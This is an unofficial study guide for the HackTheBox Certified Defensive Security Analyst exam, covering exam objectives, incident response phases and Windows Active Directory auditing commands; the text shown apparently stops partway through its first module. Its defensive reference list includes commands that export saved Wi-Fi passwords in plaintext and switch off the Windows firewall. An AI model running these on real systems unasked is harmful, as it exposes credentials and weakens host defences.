HackTheBox Certified Defensive Security Analyst (HTB CDSA)
Unofficial Study Notes
Companion Guide For Preparation
The Masterminds Notes
About The Authors
The MasterMinds Group is a group of talented authors and
writers who are experienced and well-versed across
different fields. The group is led by Motasem Hamdan,
a cybersecurity content creator and YouTuber.
The MasterMinds Group offers students and professionals
study notes, book summaries, online courses and
references across different work areas such as:
     Cybersecurity & Hacking
     Information Technology & System Administration
     Digital Marketing
     Business & Money
     Fitness & Health
     Self Improvement
     Data Analytics
     Blogging & Making Money Online
     Psychology
     Engineering
The group offers consultation services in the following areas:
     Cybersecurity Consultation: this includes specialized
     article-writing services and malware removal.
     Digital Marketing & System Administration: this
     includes SEO and Google & Meta advertising.
Contact: consultation@motasem-notes.net
Instagram: mastermindsstudynotes
Web: Masterminds Notes
Store: Browse
Table of Contents
     About The Exam
     Exam Objectives
     HTB Machines and Materials For Preparation
          1. Blue Team Labs
          2. HTB Academy Modules
          3. HackTheBox Blue Team Machines
          4. Pro Labs for Advanced Blue Team Skills
     Necessary Tools To Understand
     Additional Tips To Pass
     Module 1: Incident Response
     Introduction
     Preparation and Auditing
          Windows AD and System Auditing
                Logged-in Users
                Auditing Workstations
                User Auditing
                Auditing Logins and accounts
                Auditing System Info
                Network Auditing
                     Network Auditing with netsh utility
                Services and Processes
                Auditing Group Policy
                Auditing startup items
                Auditing Network Shares
                Netview Tool
          Auditing AD with PowerView.ps1
     Linux
          Auditing System Information
          Auditing Users
          Auditing Startups
          Auditing Network Information
          Auditing Logs
          Auditing Applications
     Kernel Backdoors
          Check Kernel Logs for Suspicious Modules
          Investigate the Kernel Module Itself
          Extract and Analyze with strings
          Summary
          Tools/Functions Often Abused
     AD Enumeration with DSquery
Identification and Detection
     Malware Analysis
          Creating The Environment
          Static Analysis
               Definition
               Tools
                Hex and ASCII View of the Suspected File
               Analyzing strings
               Extracting File Hash
               Finding The Imphash
               Analyzing The Signature
               Analyzing PE Headers
          Dynamic Analysis
               Definition
               Dynamic analysis tools
         Sandboxes
         Analysis tools
         Dynamic Analysis with Process Monitor
         Dynamic Analysis with API Logger
         Dynamic Analysis with API Monitor
         Dynamic Analysis with Process
         Explorer
         Dynamic Analysis with Regshot
Malware Analysis Evasion Techniques
    Packing and obfuscation
    Long sleep calls
    User activity detection
    Footprinting user activity
    Detecting VMs
Malware Detection and Triage
    Methodology
Automated Malware Scanning
    Linux
    Windows
         With Anti Viruses
         Sys Internals Tools
Analyzing startup processes and autoruns
    Windows
    Linux
Analyzing processes
    Windows
    Linux
Analyzing Logs
    Windows
         With wevtutil.exe
         With PowerShell
    Linux
Hunting Based on File Search and Processing
    Windows
Linux
Analyzing WMI Instances
    Manually
     Retrieving WMI event filters and consumers
     Retrieving bindings for a specific event filter
    With Autorun
Hunting Malware with Yara
    Installing Yara
         Through package manager
         Manually
    Creating rules
    Automated yara rules creation
    Yara scanners
    Useful modules for malware analysis
    Resources for Yara rules
Reverse Engineering
    Definition
    PC Reverse Engineering
         Basics
         Definitions and Terms
         Compiling Assembly Code
         General Remarks
         Reverse Engineering Tools
    PDF analysis & reverse engineering
    MS Office analysis & reverse engineering
    Android Reverse Engineering
                Tools
                Methodology
Eradication and Malware Removal
- Windows
- Linux
Recovery and Remediation
- Patching
- Firewall Operations
- Windows
- AppLocker
- With GPO
- With PowerShell
- Security controls and hardening using the Registry
editor
- Recovery
     Backup and Restore
          Windows
                Group Policy Update and Recovery
                Volume Shadow Service
          Linux
Module 2: Threat Intelligence and Hunting
Cyber Threat Intelligence
     Definitions
          Information Sharing and Analysis Centers
          (ISACs)
          TTP
     How to gather threat intelligence
     Threat Intelligence Types
     Steps to create threat intelligence campaign
     Lifecycle Phases of Cyber threat intelligence
          Direction
     Collection
     Processing
     Analysis
     Dissemination
     Feedback
Threat Intelligence Frameworks
     MITRE ATT&CK
      TIBER-EU (Threat Intelligence-Based Ethical
      Red Teaming)
     OST Map
     TAXII
     STIX
     The Diamond Model
     The Unified Kill Chain
     The Cyber Kill Chain
Threat Intelligence Platforms
     Malware Information Sharing Platform
             Definition
             MISP Use Cases
             Installation and Setting Up
             The Instance Dashboard Breakdown
             Event Actions
             Input filters
             Global actions
             Creating an event
             Adding attributes to the event
             Adding attachments to the event
             Tags
             Publishing the event
     OpenCTI
         Definition
         Connectors
         Activities Section
         Analysis Tab
         Events
         Observations
    Knowledge Section
         Threats
         Arsenal
    The Hive
         Key terms
         Cases and Tasks
                Creating cases and tasks
         TTPs
         Observables
         Cortex
         Dashboards
         MISP ( Malware information sharing
         platform)
         Live stream
         User Profiles
         Links
Threat modelling
    Definition of Threat Modeling
    Threat Modeling vs Threat Hunting
    Creating a Threat Modeling Plan
    Threat Modeling Team
    Microsoft Threat Modeling Tool
    Threat Modeling Frameworks
         PASTA
              STRIDE
              DREAD Framework
    Detection Engineering
         Definition
         Creating Detection Rules
     Threat Emulation
         Definitions
              MITRE ATT&CK
              Atomic Testing
              TIBER-EU Framework
              CTID Adversary Emulation Library
              CALDERA
         Threat Emulation Steps
Module 3: Log Analysis Essentials
    Understanding Logs
    Collecting Logs
    Log Management
    Log Analysis
Windows Logs Analysis
    Enable success and failure logging on all
    categories
    Auditing Windows Event Logs from command line
    Investigating Event logs with PowerShell
         Auditing all the logs in the local PC
         Auditing log providers
         Listing log providers with 'powershell' as a
         keyword
         Listing events related to windows
         powershell
Listing available logs containing given
keyword
Listing events on a specific log path
Finding process related information using a
given keyword about the process
listing application logs from WLMS provider
and generated at the given time
Displaying events logged for processes that
initiated network connections
listing security logs with sam as target
username and event id equals to 4724
listing security logs with event id equals to
400
listing logs from log file with event id = 104
and format as list displaying all events
properties
listing logs from log file with event id =
4104 with string 'ScriptBlockText' and
format as list displaying all events
properties
listing logs from log file with event id =13
with string 'enc' in the message field and
format as list displaying all events
properties
filtering events using time range
listing security logs with sam as target
username and event id equals to 4799
Listing accounts validation logs in the last
10 days
Auditing accounts logged on/off in the last
two days
         Auditing access to file shares, file system,
         SAM and registry in the last two days
         Auditing the use of privilege
         Auditing system changes and integrity
         events
         Detecting the use of psexec
    Investigating Logs with Sysmon and Powershell
         Hunting for Metasploit events
         Filtering for Network connections
         Filtering for Network connections in format
         list with maximum quantity of one
         Filtering for process access events
         specifically lsass.exe
         Filtering for Alternate Data Streams events
         Filtering for process hollowing events
    Investigating IIS logs
    Investigating Windows Event Logs with Timeline
    explorer
    Investigating Windows Event Logs with Sysmon
    View
    Investigating Windows Event Logs with Python-
    evtx tools
    Windows Event IDs
         Security
    Sysmon Events
Linux Log Analysis
    Manual Analysis
         Auditing authentication logs
         Listing stats about services used in
         authentication
         Auditing User login logs in Ubuntu
           Auditing samba activity
           Auditing cron job logs
           Auditing sudo logs
           Filtering 404 logs in Apache
           Auditing files requested in Apache
           View root user command history
           View last logins
           Viewing SSH authentication logs
           Viewing stats about failed login attempts
           sorted by user
           Viewing successful authentication logs
           View currently logged in users
    Manual Log Analysis with ULogViewer
    Network Logs
Logs Centralization
    SIEM
    Syslog Protocol
Module 4: Network Traffic Analysis
    Basics
    Wireshark
           Definition
           Dashboard
           Loading PCAP Files For Analysis
           Sniffing Packets
           Capture File Details
           Packet Dissection
           Finding and Navigating Through Packets
           Filter Types
           Example Display Filters
           Data Extraction and Statistics
       Creating Filter Bookmarks
       Comparison Operators
       Practical Scenarios
TCPDUMP
Tshark
       Definition
       Sniffing Traffic / Live Capture
       PCAP Analysis
       Analytics
       Fields Extraction
       Conditional Data Extraction
Zeek
       Definition
       Zeek Architecture
       Zeek Frameworks
       Running Zeek as a service
       Running Zeek as a Packet Investigator
       Logging
       Zeek Signatures
       Zeek Scripts
       Signatures with Scripts
       Zeek Frameworks
       Zeek Package Manager
Network Miner
       Definition
       Use Cases of Network Miner
       Operating Modes
       Tool Components
Brim
       Definition
         Input Formats
         Queries in Detail
         Custom Queries
         Investigative Queries
Module 5: Endpoint Security and Monitoring
    OSquery
         Definition
         Investigation methodology
         Entering the interactive mode
         Display the help menu
         Displaying version and other values for the
         current settings
         Change output mode
          Querying the version of OSquery installed
          on a Windows endpoint
          Checking the available tables
          Displaying tables containing a specific
          aspect of Windows
          Displaying and querying the columns of a
          table
          Display information about running processes
          Display number of running processes
          Joining the results of two tables (requires
          one common column)
          Investigate services such as Windows
          Defender
          Investigate Windows Defender logs
         Investigate sysmon logs
         Investigate Browsers
    Sysmon
Definition
What Can You Do with Sysmon?
How to Install and Configure Sysmon
     Step 1: Download Sysmon
     Step 2: Install Sysmon
     Step 3: Create or Download a
     Configuration File
     Step 4: Start Sysmon with the
     Configuration File
     Step 5: Verify Sysmon Installation
Configuring and Tuning Sysmon
     Example Configuration Snippet
Updating Sysmon
Uninstalling Sysmon
Creating Alerts for High-Value Events
     Process Creation Alerts
     Network Connection Alerts
     Registry Modification Alerts
Parsing Sysmon Logs with Powershell
     1. Basic Retrieval of Sysmon Logs
     2. Filter Sysmon Logs by Event ID
     3. Retrieve Sysmon Logs within a
     Specific Date Range
     4. Filter Sysmon Logs by Keywords
     5. Display Sysmon Logs in a Table
     6. Export Sysmon Logs to a CSV File
     7. Example: Advanced Filtering with
     Multiple Conditions
Automating with a Script
Threat Hunting with Sysmon
         Hunting for PowerShell Abuse
         Detecting Suspicious Network
         Connections
         Suspicious DLL Injection
         Detecting Persistence Techniques
         (Registry Monitoring)
         Tracking Credential Dumping
    Proactive Threat Hunting Techniques
         Baseline Normal Activity
         Use YARA Rules and Sysmon
         Configurations
         Look for Command-Line Obfuscation
         Search for Suspicious Parent-Child
         Process Relationships
         Automating Threat Hunting with Scripts
    Integrating Sysmon with SIEM for
    Centralized Monitoring
         Benefits of SIEM Integration:
         Sample SIEM Queries
    Common Sysmon Event IDs for Reference
         Common Sysmon Event IDs
Yara Rules
    Definition
    Creating Yara Rules
    Components of a Yara Rule
    Yara Scanners
         LOKI
         THOR
         yaraGEN
         VALHALLA
         Yara Rules with YaraGen for Malware
         Detection
              Installing YaraGen
              Running YaraGen
              Example Output from YaraGen
         Testing and Fine-Tuning YARA Rules
              Testing YARA Rules
              Fine-Tuning YARA Rules
         Examples of Advanced YARA Rules for
         Malware Detection
              Detecting Packed Files
         Resources
Module 6: SIEM and Detection Engineering
    Splunk
         Introduction to IPS & IDS
         Definitions
              Host
              Source
              Tags
              Indexes
              Splunk Forwarder
              Splunk Indexer
              Splunk Search Head
         Search Processing Language
         Basic Search Commands
         Comparison Operators
         Boolean Operators
         Statistical Functions
         Chart Commands
         Log Monitoring
      Continuous Log Monitoring From A
      Log File
     Continuous Log Monitoring Through
     Network Ports
     Continuous Log Monitoring Through
     Splunk Universal Forwarder
Splunk Installation
     On Linux
     On Windows
Collecting Logs
     From Linux Machines
     From Windows Machines
Operational Notes
Using Splunk For Incident Response
      Parsing Suricata IDS Logs
     Parsing http traffic
     Parsing general network traffic
     Parsing Sysmon events
     Parsing Fortinet Firewall logs
     USB attacks
     File sharing
     Parsing DNS
     Email Activity
     FTP events
     AWS Events
     Symantec endpoint protection events
     O365 Events
     WIN event logs
     Linux events
      OSquery
           SSH Events
           Detecting PrintNightmare vulnerability
                   Identifies Print Spooler adding a
                   new Printer Driver
                   Detects spoolsv.exe with a child
                   process of rundll32.exe
                   Suspicious rundll32.exe instances
                   without any command-line
                   arguments
                   Detects when a new printer plug-
                   in has failed to load
      Creating Alerts
      Reporting With Splunk
      Creating Dashboards
ELK
      Definition
      Purpose of ELK
      Methodology
           I am a data analyst, how should I
           start?
           I am a security engineer, how should I
           start?
      Components of elastic stack
      Elastic Search
           Purposes of Using Elastic Search
           Elastic Search Index
           Elastic Search Node
           Elastic Search Clusters
           Elastic Search Installation and
           configuration
           Elastic Search Configuration
    Verifying Installation
    Executing Search Queries in Elastic
    Search
Ingesting Logs
    With Elastic Agent
    With Log Stash
         Installing and Configuring
         Logstash
    With Beats
         Types of Beats
         Installation and Configuration
Beats Vs Logstash: Which one to use for
log collection and ingestion?
Example Ingesting Fortinet Firewall Logs
Kibana
    Installing and Configuring Kibana
    Kibana Components
         Discover Tab
         Fields
         Tables
    KQL (Kibana Query Language)
         Reserved Characters in KQL
         WildCards in KQL
         Searching The Logs with KQL
    Data Visualization
    Dashboards
    Creating Canvas with Kibana
    Creating Maps with Kibana
    Creating Alerts in Kibana
Cyber Cases Studies
About The Exam
Passing the HackTheBox Certified Defensive Security
Analyst (CDSA) certification requires a solid grasp of
cybersecurity fundamentals, practical skills in incident
response, threat detection, and analysis, as well as
hands-on experience in a lab environment.
     The HTB CDSA exam is a practical, hands-on test
     focusing on defensive security skills.
     It typically involves real-world scenarios like analyzing
     malicious activity, conducting incident response, and
     working through various defensive techniques in a lab
     setting.
     The exam duration (7 days as of this writing) and
     exact passing criteria can vary, so it’s essential to
     check [HackTheBox’s official documentation](https://academy.hackthebox.com/preview/certifications/htb-certified-defensive-security-analyst)
     for the latest guidelines.
Exam Objectives
     Threat Intelligence & Hunting: Learn to collect and
     analyze threat intelligence, identify Indicators of
     Compromise (IoCs), and utilize threat-hunting
     techniques to discover malicious activity in systems.
     Incident Response & Management: Understand
     incident response phases, including preparation,
     identification, containment, eradication, recovery,
     and lessons learned.
     Log Analysis: Get comfortable with analyzing logs
     from sources such as SIEM (Security Information and
  Event Management), firewalls, and network devices.
  Practice parsing, filtering, and analyzing logs for
  evidence of threats.
  Network Traffic Analysis: Familiarize yourself with
  network traffic analysis tools like Wireshark, Zeek,
  and tcpdump. Learn to recognize common attack
  patterns in network traffic (e.g., port scanning,
  exfiltration).
  Endpoint Security: Gain experience with tools and
  techniques for analyzing endpoint activity, such as
  file system changes, process monitoring, and
  registry analysis.
  Malware Analysis: Know the basics of malware
  analysis, including how to identify malicious files,
  review their behavior in a controlled environment,
  and analyze file metadata for clues.
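Several of these objectives come down to pulling IoCs out of raw logs. As a warm-up, here is a minimal Python sketch that extracts candidate IP addresses from firewall-style log entries; the log lines are invented for illustration, and the regex is a loose triage matcher rather than strict IPv4 validation:

```python
import re

# Hypothetical firewall-style log lines; real data would come from a SIEM export.
log_lines = [
    "2024-05-01 10:02:11 ACCEPT src=203.0.113.45 dst=10.0.0.5 dport=443",
    "2024-05-01 10:02:15 DENY   src=198.51.100.7 dst=10.0.0.5 dport=22",
]

# Naive IPv4 matcher -- good enough for triage, not strict validation.
ip_pattern = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Deduplicate and sort the candidate IoCs.
iocs = sorted({ip for line in log_lines for ip in ip_pattern.findall(line)})
print(iocs)  # ['10.0.0.5', '198.51.100.7', '203.0.113.45']
```

In practice you would compare these candidates against threat-intelligence feeds rather than review them by hand.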
HTB Machines and Materials For
Preparation
1. Blue Team Labs
  Windows Event Logs: Practice analyzing Windows
  Event logs to detect malicious behaviors, including
  suspicious logons, process creation, and registry
  modifications.
  Splunk Fundamentals: A lab focused on using Splunk
  for log aggregation, analysis, and correlation—
  essential for incident response and SOC operations.
  Wireshark Essentials: Hands-on practice in network
  traffic analysis to identify anomalies, detect
     threats, and understand network packet structures.
     Zeek (Bro) Network Security Monitor: This lab
     focuses on using Zeek (formerly known as Bro) for
     network monitoring and incident detection. Zeek logs
     are often used for network threat hunting and
     analysis.
     Sysmon Essentials: Provides experience in monitoring
     endpoint activities using Sysmon, which logs detailed
     information about process creation, network
     connections, and file modifications.
2. HTB Academy Modules
HTB Academy has modules specifically designed for
defensive security skills. Some recommended ones
include:
     Log Analysis Basics: Focuses on understanding logs
     from various sources (e.g., Windows, Linux) and
     analyzing them for security incidents.
     Incident Response Fundamentals: Covers the incident
     response lifecycle, from preparation to recovery and
     lessons learned.
     Endpoint Security and Monitoring: This module
     includes labs on monitoring endpoints and using tools
     like OSQuery for proactive threat detection.
     SIEM Basics with Elastic Stack: Provides hands-on
     practice with the ELK Stack, which is valuable for
     log management, threat detection, and incident
     response.
3. HackTheBox Blue Team Machines
HackTheBox machines offer environments that simulate
real-world security challenges. Here are some machines
aligned with blue team skills:
     Dancing: Focuses on analyzing compromised Linux
     logs to find unauthorized access and isolate attack
     patterns. It emphasizes log analysis and root cause
     determination.
     RouterSpace: Involves detecting suspicious network
     activity and discovering the extent of a security
     breach. This machine is excellent for network traffic
     analysis and log correlation.
     Cuckoo: A machine that requires basic malware
     analysis skills. It provides an opportunity to
     investigate a system infected with malware, gather
     IoCs, and conduct static and dynamic malware
     analysis.
     Entropy: Focuses on analyzing a compromised web
     server, requiring skills in log analysis and
     vulnerability detection.
     Knife: This machine tests your ability to spot
     misconfigurations and insecure application setups
     commonly exploited in real-world attacks, which you
     can then correlate with system logs for defensive
     insights.
4. Pro Labs for Advanced Blue Team
Skills
     Rastahack: Offers a larger environment with multiple
     systems that simulate a small organization’s
     network, allowing for complex incident detection and
     response exercises.
     Fortress: A Pro Lab designed to simulate a full-scale
     enterprise network with multiple machines. The lab
     includes various network configurations and an AD
     environment, which can be used to practice real-
     world defensive skills, including network defense,
     host monitoring, and log analysis.
Necessary Tools To Understand
Familiarize yourself with popular blue team tools often
used in the field, including:
     SIEM Tools: Splunk, ELK Stack (Elasticsearch,
     Logstash, Kibana)
     Network Analysis: Wireshark, tcpdump, Zeek
     Endpoint Detection & Response (EDR): Sysmon,
     OSQuery
     Threat Intelligence Platforms: MISP, Open Threat
     Intelligence Frameworks
     Malware Analysis: Ghidra, IDA Pro (basic usage), PE
     Studio, YARA rules
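Since YARA rules appear in both the malware-analysis and endpoint-monitoring objectives, it helps to recognize the basic rule anatomy early. The rule below is a minimal illustrative sketch; the rule name and strings are invented for this example, not a production detection:

```
rule Suspicious_PowerShell_Download
{
    meta:
        description = "Illustrative only: flags common download-cradle strings"
    strings:
        $a = "Net.WebClient" nocase
        $b = "DownloadString" nocase
    condition:
        all of them
}
```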
Additional Tips To Pass
     Set aside consistent time for practice labs, tool
     training, and log analysis.
     Break down topics and focus on mastering one area
     at a time, such as starting with log analysis before
     moving to malware analysis.
     Dedicate specific hours for incident response
     simulations and exercises, as this is a critical skill
     for CDSA.
     Try to simulate the exam environment by setting up
     time-limited practice sessions where you go through
     incident response and forensic analysis exercises
     without external help.
     Familiarize yourself with a note-taking system to log
     your process, findings, and commands used, which
     will help during the exam and in report writing.
     Prepare a reporting template for capturing essential
     details on findings, IoCs, and recommended
     mitigation steps.
     HackTheBox exams often require detailed
     documentation, so practice writing clear, concise,
     and accurate reports based on your investigation.
     After each practice session, review areas where you
     struggled and revisit relevant resources.
     Consider joining forums or HTB community discussions
     to clarify concepts and get tips from those who have
     completed the certification.
Module 1: Incident Response
Introduction
Incident Response Policy
An incident response policy defines a security
incident and incident response procedures. Incident
response procedures start with preparation to prepare for
and prevent incidents. Preparation
helps prevent incidents such as malware infections.
Personnel review the policy periodically and in response to
lessons learned after incidents.
incident response plan
An incident response plan provides more detail than the
incident response policy. It includes details about the
different types of incidents, the incident response team,
and their roles and responsibilities. It also includes a
communication plan which provides direction on how to
communicate issues related to an incident.
Incident Response Process
The incident response process contains the below steps in
order:
Preparation
This phase occurs before an incident and provides
guidance to personnel on how to respond to an incident. It
includes establishing and maintaining an incident response
plan and incident
response procedures. It also includes establishing
procedures to prevent incidents. For example, preparation
includes implementing security controls to prevent
malware infections.
During the preparation phase, it is also crucial to identify
high-value assets within the organization, together with
their technical composition. This will comprise the
infrastructure, intellectual property, client and employee
data, and brand reputation. Protecting these assets
ensures that the confidentiality, integrity, and availability
of the organization's services, data, and processes are
intact, which also helps maintain credibility. Additionally,
the asset classification will be helpful for the prioritization
of protective and detective measures for the assets.
The endpoints and servers also need to be fully configured
to log events and/or forward them to a central server for
later examination.
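On Linux hosts, centralized forwarding can be as simple as one rsyslog directive. The fragment below is a hedged example: the file path and collector hostname are placeholders, and the syntax should be checked against your rsyslog version's documentation:

```
# /etc/rsyslog.d/50-forward.conf (example path)
# Forward all facilities and priorities to a central collector.
# "@@" forwards over TCP; a single "@" would use UDP.
*.* @@logserver.example.com:514
```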
Identification & Scoping
In this stage, which is also called detection, the incident
is reported either through notifications from other
personnel or through the continuous log monitoring done by
the SOC team.
In this stage we verify that the observed event is an
actual incident. For example, intrusion detection systems
(IDSs) might falsely report an intrusion, so we
investigate the alert to determine whether it is a false
positive or a genuine incident. If the incident is
verified, we might isolate the system based on
established procedures.
After identification, the next critical step in the Incident
Response Process is Scoping, which involves determining
the extent of a security incident, including identifying the
affected systems, the type of data at risk, and the
potential impact on the organization.
Evidence of the incident is collected, including log files,
network traffic data, and other relevant information. The
collected evidence provides valuable insights into the
incident and helps identify potential threats. The collected
evidence is then analysed to identify artefacts related to
the incident. These artefacts can provide clues about the
nature of the threat and the extent of the damage.
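A common identification task is spotting brute-force patterns in authentication logs. The sketch below counts failed SSH logins per source IP; the sample lines are invented, and real input would typically be read from /var/log/auth.log:

```python
from collections import Counter

# Hypothetical auth-log excerpt; real data would come from /var/log/auth.log.
events = [
    "Failed password for root from 203.0.113.9 port 4321 ssh2",
    "Failed password for admin from 203.0.113.9 port 4322 ssh2",
    "Accepted password for alice from 10.0.0.8 port 5000 ssh2",
]

# Count failed logins per source IP to surface brute-force candidates.
failures = Counter(
    line.split(" from ")[1].split()[0]
    for line in events
    if line.startswith("Failed password")
)
print(failures.most_common(1))  # [('203.0.113.9', 2)]
```

A spike from a single source, especially across many usernames, is the sort of signal that turns an "event" into a verified incident.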
Containment
Containment might include quarantining a device or
removing it from the network. This can be as simple as
unplugging the system’s network interface card to ensure
it can’t communicate on the network. Similarly, you can
isolate a network from the Internet by modifying access
control lists on a router or a network firewall.
Another way to contain or isolate a system is by following
the controlled isolation strategy. This strategy involves
the incident response team closely monitoring the
adversary’s actions. Rather than strictly isolating the
infected system(s), the team keeps the system accessible
so as not to tip off the adversary. By allowing the
adversary to continue, the incident response team can
gather vital information and intelligence about them.
However, the adversary isn’t given free rein. For
example, the incident response team can cut off access
if the adversary is about to do something destructive,
such as wiping or exfiltrating data. A good “cover story”
can be made to convince the adversary why they’ve suddenly
lost access. For example, an announcement could be made
that routine maintenance is occurring.
Eradication
After containing the incident, it’s often necessary to
remove components from the attack. For example, if
attackers installed malware on systems, it’s important to
remove all remnants of the malware on all hosts. Some
malware can be automatically quarantined, cleaned up,
and removed by tools such as antiviruses (AVs) and
EDRs. However, keep in mind that this is most effective
against less sophisticated threats that employ well-known
malicious tooling. Unique or targeted threats employed by
more sophisticated adversaries are usually purpose-built
to bypass these automated detection and prevention
systems, so relying solely on this method is not advised.
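Verifying eradication often means sweeping hosts for files whose hashes match known IoCs. Here is a minimal Python sketch of that idea; the "known-bad" hash is derived from a dummy payload purely for illustration:

```python
import hashlib

# Hypothetical IoC set of known-bad SHA-256 hashes (derived from dummy data here).
known_bad = {
    hashlib.sha256(b"malicious-payload").hexdigest(),
}

def is_known_bad(data: bytes) -> bool:
    """Return True if the content's SHA-256 matches a known-bad hash."""
    return hashlib.sha256(data).hexdigest() in known_bad

print(is_known_bad(b"malicious-payload"))  # True
print(is_known_bad(b"benign-file"))        # False
```

Hash matching only catches exact copies; sophisticated threats repack their payloads, which is why it complements rather than replaces behavioral detection.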
Another eradication approach, and the most straightforward
way to remove attacker traces from a specific endpoint, is
to rebuild it completely. Wiping the system clean of
everything ensures the system has a
clean slate. The downside is that this approach is
absolute: all of the ‘normal’ contents are removed along
with the bad ones, so it is necessary to reinstall all
applications, revert all configurations, and restore all
wiped data so the system functions at least as well as it
did before the compromise, if not better.
Take note that this approach entails downtime for the
system. When deciding which eradication technique fits
the compromise scenario best, the decision is also
influenced by the allowable downtime the resources in
question have. Some organizations have ‘legacy’
resources where a few minutes of downtime could cost
the organization millions of dollars, so a complete
rebuild may be out of the question.
Recovery
We return all affected systems to normal operation and
verify they are operating normally. This might include
rebuilding systems from images, restoring data from
backups, and installing updates.
Lessons Learned
This phase of the IR process is essentially a review of
the data gathered throughout the IR process and the
lessons learned from it.
The incident may provide some valuable lessons, and we
might modify procedures or add additional controls to
prevent a recurrence of the incident.
During this phase, a technical summary and an executive
summary are written.
A technical summary is a summary of the relevant findings
about the incident from detection to recovery. The goal of
this document is to provide a concise description of the
technical aspects of the incident, but it can also function
as a quick reference guide.
An executive summary may contain the below:
     A summary of the impact of the compromise:
          Did we lose money? Was it stolen, or lost due
          to downtime of sensitive servers/endpoints?
          Did we lose data? PII? Proprietary, top-secret
          information?
          Was it a high-profile case, and if so, what
          kind of reputational damage are we looking at?
     A summary of the events and/or circumstances that
     led to/caused the compromise: how did this happen?
     A summary of the actions already taken, and the
     actions planned in the near, mid, and long term to
     remediate and recover from it, and to prevent it
     from happening again in the future
Preparation and Auditing
The commands below can be executed on a domain
controller or an Active Directory domain-joined machine.
Windows AD and System Auditing
Logged-in Users
     Below command is executed to list logged on users
     on a domain-joined machine or the domain controller
 C:\> psloggedon \\computername
     Below is to discover all logged-in users on the same
     network
 C:\> for /L %i in (1,1,254) do psloggedon
 \\192.168.1.%i >> C:\logged-users.txt
     Alternatively you can use the GUI interface of the tool
     from below link
 https://learn.microsoft.com/en-
 us/sysinternals/downloads/psloggedon
Auditing Workstations
     Listing workstations
 C:\> netdom query WORKSTATION
     Listing servers in the domain
 C:\> netdom query SERVER
     Listing primary domain controllers
 C:\> netdom query PDC
     Listing all computers joined to the main domain
     controller
 C:\> dsquery COMPUTER "OU=servers,DC=<DOMAIN
 NAME>,DC=<DOMAIN EXTENSION>" -o rdn -limit 0 >
 C:\PCs.txt
User Auditing
Listing inactive users for a specified number of weeks
 C:\> dsquery user domainroot -inactive
 [number-of-weeks]
Current user
 C:\> whoami
Retrieve all users
 C:\> net users
Retrieve administrators
 C:\> net localgroup administrators
Retrieve administrators Groups
 C:\> net group administrators
Retrieve user info with wmic
 C:\> wmic rdtoggle list
 C:\> wmic useraccount list
 C:\> wmic group list
 C:\> wmic netlogin get name,
 lastlogon,badpasswordcount
 C:\> wmic netclient list brief
Using history file
 C:\> doskey /history > history.txt
Get information about other users according to department
 PS> Get-NetUser -filter "department=HR*"
List users
 net users
View specific details about a user
 net users admin
View groups
 net localgroup
View privilege of current user:
 C:\> whoami /priv
View users of administrator group
 C:\> net localgroup Administrators
Auditing Logins and accounts
     Listing users created on the specified time in
     YYYYMMDDHHMMSS
 C:\> dsquery * -filter
 "((whenCreated>=YYYYMMDDHHMMSS.0Z)&
 (objectClass=user))"
     You can also list all objects created on a specified
     time/date regardless of the object type
 C:\> dsquery * -filter
 "(whenCreated>=YYYYMMDDHHMMSS.0Z)"
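The `YYYYMMDDHHMMSS.0Z` value is an LDAP generalized-time string in UTC. A small Python sketch (the 30-day window is an arbitrary example) to build one for "created in the last N days" queries:

```python
from datetime import datetime, timedelta, timezone

def ldap_timestamp(days_back: int) -> str:
    """LDAP generalized-time string (UTC) for `days_back` days ago."""
    t = datetime.now(timezone.utc) - timedelta(days=days_back)
    return t.strftime("%Y%m%d%H%M%S") + ".0Z"

# Example: a dsquery filter for user objects created in the last 30 days
filt = "((whenCreated>=" + ldap_timestamp(30) + ")&(objectClass=user))"
print(filt)
```

The resulting string can be pasted directly into the `dsquery * -filter` commands above.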
       Listing all users created since a specified time
      [1]
 C:\> dsquery * dc=<DOMAIN NAME>,dc=<DOMAIN
 EXTENSION> -filter "(&(objectCategory=Person)
 (objectClass=User)
 (whenCreated>=YYYYMMDDHHMMSS.0Z))"
[2]
 C:\> adfind -csv -b dc=<DOMAIN NAME>,dc=
 <DOMAIN
 EXTENSION> -f "(&(objectCategory=Person)
 (objectClass=User)
 (whenCreated>=YYYYMMDDHHMMSS.0Z))"
       Listing all AD accounts created in the last 30 days
       using Powershell
      [1]
 PS C:\> import-module activedirectory
 PS C:\> Get-QADUser -CreatedAfter (Get-Date).AddDays(-30)
[2]
 PS C:\> import-module activedirectory
 PS C:\> Get-ADUser -Filter * -Properties
 whenCreated | Where-Object {$_.whenCreated -ge
 ((Get-Date).AddDays(-30)).Date}
Auditing System Info
Date and Time
 C:\> echo %DATE% %TIME%
Host-Name
 C:\> hostname
All systeminfo
 C:\> systeminfo
Export OS info into a file with Powershell
 Get-WmiObject -Class Win32_OperatingSystem |
 Select-Object -Property * | Export-Csv
 c:\os.csv
OS Name
 C:\> systeminfo | findstr /B /C:"OS Name"
 /C:"OS Version"
System info with wmic
 C:\> wmic csproduct get name
 C:\> wmic bios get serialnumber
 C:\> wmic computersystem list brief
System info with sysinternals
 C:\> psinfo -accepteula -s -h -d
 Ref. https://technet.microsoft.com/en-us/sysinternals/psinfo.aspx
Network Auditing
With netstat
Open Connections
 C:\> netstat -ano
Listening Ports
 netstat -an | findstr LISTENING
Other netstat commands
 C:\> netstat -e
 C:\> netstat -naob
 C:\> netstat -nr
 C:\> netstat -vb
 C:\> nbtstat -s
View routing table
 C:\> route print
View ARP table
 C:\> arp -a
View DNS settings
 C:\> ipconfig /displaydns
Proxy Information
 C:\> netsh winhttp show proxy
All IP configs
 C:\> ipconfig /allcompartments /all
Network Interfaces
 C:\> netsh wlan show interfaces
 C:\> netsh wlan show all
With registry
 C:\> reg query
 "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio
 n\Internet
 Settings\Connections\WinHttpSettings"
 C:\> type
 %SYSTEMROOT%\system32\drivers\etc\hosts
With wmic
 C:\> wmic nicconfig get
 descriptions,IPaddress,MACaddress
 C:\> wmic netuse get
 name,username,connectiontype, localname
Network Auditing with netsh utility
Saved wireless profiles
 netsh wlan show profiles
Export wifi plaintext pwd
 netsh wlan export profile folder=. key=clear
List interface IDs/MTUs
 netsh interface ip show interfaces
Set IP
 netsh interface ip set address local static
 IP netmask gateway ID
Set DNS server
 netsh interface ip set dns local static ip
Set interface to use DHCP
 netsh interface ip set address local dhcp
Disable Firewall
 netsh advfirewall set currentprofile state off
 netsh advfirewall set allprofiles state off
Services and Processes
Listing processes
 C:\> tasklist
 C:\> tasklist /SVC
 C:\> tasklist /SVC /fi "imagename eq
 svchost.exe"
